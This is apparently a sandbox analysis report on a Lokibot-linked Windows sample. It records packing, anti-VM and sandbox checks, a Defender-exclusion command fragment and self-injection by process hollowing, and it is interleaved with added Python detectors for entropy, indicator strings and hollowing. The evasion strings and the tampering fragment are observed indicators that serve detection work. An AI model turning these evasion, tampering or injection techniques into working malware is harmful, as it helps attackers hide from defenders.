                Source: FJbeidnZOF.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
                Source: unknownProcess created: C:\Users\user\Desktop\FJbeidnZOF.exe 'C:\Users\user\Desktop\FJbeidnZOF.exe'
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess created: C:\Users\user\Desktop\FJbeidnZOF.exe C:\Users\user\Desktop\FJbeidnZOF.exe
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess created: C:\Users\user\Desktop\FJbeidnZOF.exe C:\Users\user\Desktop\FJbeidnZOF.exeJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: FJbeidnZOF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: FJbeidnZOF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                Yara detected aPLib compressed binary
                Source: Yara match | File source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: FJbeidnZOF.exe PID: 5472, type: MEMORY
                Source: Yara match | File source: Process Memory Space: FJbeidnZOF.exe PID: 5392, type: MEMORY
                Source: Yara match | File source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 1_2_0701362E pushad ; retf 1_2_07013639
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
                Source: initial sample | Static PE information: section name: .text entropy: 7.61153237798
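The .text entropy of 7.61 above, together with the IMAGE_SCN_CNT_CODE / IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_READ characteristics reported for that section, is the static hint that the first stage carries a packed or encrypted payload. The script below is an added example (not code from this report or from Joe Sandbox) that reproduces that check with the standard library only: it walks the DOS header, COFF file header and section table, decodes the characteristics named in the report and computes Shannon entropy per section. The minimal PE it builds is constructed for the example, and the 7.0 threshold is a common heuristic rather than a value from the report.

```python
"""Per-section entropy and characteristics triage for a PE file (added example)."""
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = {  # listed in the order the report renders them
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}
PACKED_THRESHOLD = 7.0  # heuristic (assumption), not a value from the report


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Return one dict per section header: name, RVA, raw size, decoded flags, entropy."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(nsec):
        off = table + 40 * i
        name, _vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        (chars,) = struct.unpack_from("<I", pe, off + 36)  # Characteristics field
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "rva": vaddr,
            "raw_size": raw_size,
            "flags": [n for bit, n in FLAG_NAMES.items() if chars & bit],
            "entropy": shannon_entropy(raw),
        })
    return sections


def suspicious_sections(sections, threshold=PACKED_THRESHOLD):
    """Names of executable sections whose entropy is at or above the threshold."""
    return [s["name"] for s in sections
            if "IMAGE_SCN_MEM_EXECUTE" in s["flags"] and s["entropy"] >= threshold]


def build_sample_pe():
    """Constructed minimal PE32 image with two sections (not the analysed sample)."""
    text = bytes(range(256)) * 4       # uniform byte distribution: entropy 8.0
    rdata = b"A" * 512                 # constant bytes: entropy 0.0
    e_lfanew, opt_size = 0x40, 224     # PE32 optional header is 224 bytes
    headers_len = e_lfanew + 4 + 20 + opt_size + 40 * 2
    text_ptr = (headers_len + 0x1FF) & ~0x1FF   # first section at 512-byte file alignment
    rdata_ptr = text_ptr + len(text)

    def section_header(name, rva, data, ptr, chars):
        return (struct.pack("<8sIIII", name, len(data), rva, len(data), ptr)
                + b"\0" * 12 + struct.pack("<I", chars))

    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, rest zeroed
    secs = (section_header(b".text", 0x1000, text, text_ptr,
                           IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
            + section_header(b".rdata", 0x2000, rdata, rdata_ptr,
                             IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ))
    image = dos + b"PE\0\0" + coff + opt + secs
    image += b"\0" * (text_ptr - len(image))
    return image + text + rdata


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s['name']:<8} rva=0x{s['rva']:x} size={s['raw_size']} "
              f"entropy={s['entropy']:.2f} flags={', '.join(s['flags'])}")
    print("packed-looking:", suspicious_sections(secs))
```

Run it against a real file with `parse_sections(open(path, "rb").read())`; a .NET loader like this stage 1 normally keeps most of its bytes in .text, so a single high-entropy executable section is consistent with an embedded, compressed second stage (here the aPLib-packed Lokibot payload) rather than with ordinary compiled code.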
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Process information set: NOOPENFILEERRORBOX (32 identical entries in the report)
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Process information set: NOGPFAULTERRORBOX (115 identical entries in the report)

                Malware Analysis System Evasion:

                Yara detected AntiVM3
                Source: Yara match | File source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: FJbeidnZOF.exe PID: 5392, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe TID: 5396 | Thread sleep time: -100468s >= -30000s
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe TID: 672 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe TID: 5996 | Thread sleep time: -660000s >= -30000s
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Thread delayed: delay time: 100468
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Thread delayed: delay time: 60000
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: vmware
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: VMWARE
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h] 5_2_0040317B
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap, 5_2_00402B7C
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Memory allocated: page read and write | page guard
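The sandbox and VM checks above are all visible as plain strings in the stage-1 memory region (SbieDll.dll for Sandboxie, wine_get_unix_file_name for Wine, the VMware Tools registry key and install path, the "VMware SVGA II" display adapter name, the SCSI and disk enumeration keys), alongside an Add-MpPreference -ExclusionPath fragment that points at a Defender exclusion being added. Stage 1 is a .NET assembly (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is present), so its string literals sit in memory as UTF-16LE and an ASCII-only grep over a dump misses most of them. The scanner below is an added example, not code from this report or from Joe Sandbox: it searches each indicator in both encodings, case-insensitively, and reports offset, encoding and category. The indicator strings are the ones listed above; the category names and the dump bytes it scans are constructed for the example.

```python
"""Scan a process memory dump for the sandbox/VM indicators listed in the report (added example)."""
import re

INDICATORS = {  # category names are the example's own; strings are from the report
    "sandbox-dll": ["SbieDll.dll", "wine_get_unix_file_name"],
    "vmware-registry": [
        "SOFTWARE\\VMware, Inc.\\VMware Tools",
        "SYSTEM\\ControlSet001\\Services\\Disk\\Enum",
        "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0",
        "SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000",
    ],
    "vmware-artifact": ["VMware SVGA II", "C:\\Program Files\\VMware\\VMware Tools\\"],
    "defender-tamper": ["Add-MpPreference -ExclusionPath"],
}
ENCODINGS = ("ascii", "utf-16le")


def compile_patterns(indicators=INDICATORS):
    """One case-insensitive bytes regex per (category, indicator, encoding)."""
    compiled = []
    for category, strings in indicators.items():
        for s in strings:
            for enc in ENCODINGS:
                # re.IGNORECASE on a bytes pattern folds ASCII letters only, which is
                # enough here: in UTF-16LE every letter is one byte followed by NUL.
                pat = re.compile(re.escape(s.encode(enc)), re.IGNORECASE)
                compiled.append((category, s, enc, pat))
    return compiled


def scan(dump, indicators=INDICATORS):
    """Return hits sorted by offset: {offset, encoding, category, indicator}."""
    hits = []
    for category, s, enc, pat in compile_patterns(indicators):
        for m in pat.finditer(dump):
            hits.append({"offset": m.start(), "encoding": enc,
                         "category": category, "indicator": s})
    return sorted(hits, key=lambda h: h["offset"])


def summarize(hits):
    """Count hits per category; any non-empty result is the triage signal."""
    counts = {}
    for h in hits:
        counts[h["category"]] = counts.get(h["category"], 0) + 1
    return counts


def build_sample_dump():
    """Constructed dump: one ASCII indicator and three UTF-16LE ones between zero padding."""
    pad = b"\0" * 64
    return (pad + "VMware SVGA II".encode("ascii")
            + pad + "sbiedll.dll".encode("utf-16le")      # case differs from the indicator
            + pad + "SOFTWARE\\VMware, Inc.\\VMware Tools".encode("utf-16le")
            + pad + "Add-MpPreference -ExclusionPath".encode("utf-16le") + pad)


if __name__ == "__main__":
    found = scan(build_sample_dump())
    for h in found:
        print(f"0x{h['offset']:06x} {h['encoding']:<8} {h['category']:<16} {h['indicator']}")
    print(summarize(found))
```

Feed it a full dump with `scan(open(path, "rb").read())`; on a real .NET loader expect the registry and device strings to show up in UTF-16LE only, which is why a Yara rule for this family should carry `wide` on those strings as well as `ascii`.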

                HIPS / PFW / Operating System Protection Evasion:

                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Memory written: C:\Users\user\Desktop\FJbeidnZOF.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Process created: C:\Users\user\Desktop\FJbeidnZOF.exe C:\Users\user\Desktop\FJbeidnZOF.exe
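The two entries above, read together with "Creates a process in suspended mode" from the signature summary, describe process hollowing: the .NET loader (PID 5392) starts a second copy of itself (PID 5472), writes a buffer beginning with the MZ header (4D5A) at the child's image base 0x400000, and lets it run; that child is where the Loki_1 / Lokibot rules match in 5.2.FJbeidnZOF.exe.400000.0.unpack. The detector below is an added example, not code from this report or from Joe Sandbox. It scores a per-process API trace for the usual RunPE stages and surfaces the self-injection case. The PIDs and the 0x400000 base are the report's; the trace format and the NtUnmapViewOfSection / SetThreadContext calls are assumptions about how such a trace looks, not something the report shows.

```python
"""Flag process hollowing from a constructed API-call trace (added example)."""
CREATE_SUSPENDED = 0x00000004
REQUIRED = ("suspended-create", "write-pe-header", "resume")


def detect_hollowing(events):
    """Group events by (injector pid, target pid) and return the pairs that complete RunPE."""
    state = {}
    for idx, ev in enumerate(events):
        api, args = ev["api"], ev["args"]
        if api in ("CreateProcessW", "CreateProcessA"):
            if args.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
                key = (ev["pid"], ev["ret"]["dwProcessId"])
                state[key] = {
                    "stages": {"suspended-create": idx},
                    "target_image": args.get("lpApplicationName"),
                    # this sample hollows a copy of itself; worth surfacing on its own
                    "self_injection": args.get("lpApplicationName") == ev.get("image"),
                    "image_base_written": None,
                }
            continue
        st = state.get((ev["pid"], args.get("target_pid")))
        if st is None:
            continue  # activity against a process this pid did not create suspended
        stages = st["stages"]
        if api == "NtUnmapViewOfSection":
            stages.setdefault("unmap-original", idx)
        elif api == "WriteProcessMemory" and args.get("buffer_head", "").upper().startswith("4D5A"):
            stages.setdefault("write-pe-header", idx)   # first MZ write is the new image base
            st["image_base_written"] = args.get("base")
        elif api == "SetThreadContext":
            stages.setdefault("set-entrypoint", idx)
        elif api == "ResumeThread":
            stages.setdefault("resume", idx)
    findings = []
    for (injector, target), st in state.items():
        stages = st["stages"]
        # the PE header must land before the thread is resumed, otherwise it is not hollowing
        if all(s in stages for s in REQUIRED) and stages["write-pe-header"] < stages["resume"]:
            findings.append({
                "injector_pid": injector, "target_pid": target,
                "target_image": st["target_image"],
                "image_base_written": st["image_base_written"],
                "self_injection": st["self_injection"],
                "stages": sorted(stages, key=stages.get),
            })
    return findings


SELF = "C:\\Users\\user\\Desktop\\FJbeidnZOF.exe"


def build_sample_trace():
    """Constructed trace mirroring the report: 5392 hollows a suspended copy of itself, 5472."""
    return [
        {"pid": 5392, "image": SELF, "api": "CreateProcessW",
         "args": {"lpApplicationName": SELF, "dwCreationFlags": CREATE_SUSPENDED},
         "ret": {"dwProcessId": 5472}},
        {"pid": 5392, "image": SELF, "api": "NtUnmapViewOfSection",
         "args": {"target_pid": 5472, "base": 0x400000}},
        {"pid": 5392, "image": SELF, "api": "WriteProcessMemory",
         "args": {"target_pid": 5472, "base": 0x400000, "buffer_head": "4D5A9000"}},
        {"pid": 5392, "image": SELF, "api": "WriteProcessMemory",
         "args": {"target_pid": 5472, "base": 0x401000, "buffer_head": "558BEC83"}},
        {"pid": 5392, "image": SELF, "api": "SetThreadContext", "args": {"target_pid": 5472}},
        {"pid": 5392, "image": SELF, "api": "ResumeThread", "args": {"target_pid": 5472}},
    ]


def build_benign_trace():
    """Constructed control: an ordinary, non-suspended child launch with no memory writes."""
    parent = "C:\\Windows\\explorer.exe"
    return [
        {"pid": 1000, "image": parent, "api": "CreateProcessW",
         "args": {"lpApplicationName": "C:\\Windows\\notepad.exe", "dwCreationFlags": 0},
         "ret": {"dwProcessId": 1001}},
        {"pid": 1000, "image": parent, "api": "ResumeThread", "args": {"target_pid": 1001}},
    ]


if __name__ == "__main__":
    for f in detect_hollowing(build_sample_trace()):
        print(f"hollowing: {f['injector_pid']} -> {f['target_pid']} "
              f"base=0x{f['image_base_written']:x} self={f['self_injection']} stages={f['stages']}")
    print("benign:", detect_hollowing(build_benign_trace()))
```

The ordering check matters for precision: a debugger or an installer may legitimately create a suspended child and resume it, and a loader may write to a child after it is running; only the combination of a suspended create, an MZ-led write into the child before the first resume, and the resume itself is the hollowing pattern. The unmap and SetThreadContext stages are reported when seen but not required, because RunPE variants differ on both.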
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmp | Binary or memory string: Progman
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Users\user\Desktop\FJbeidnZOF.exe VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
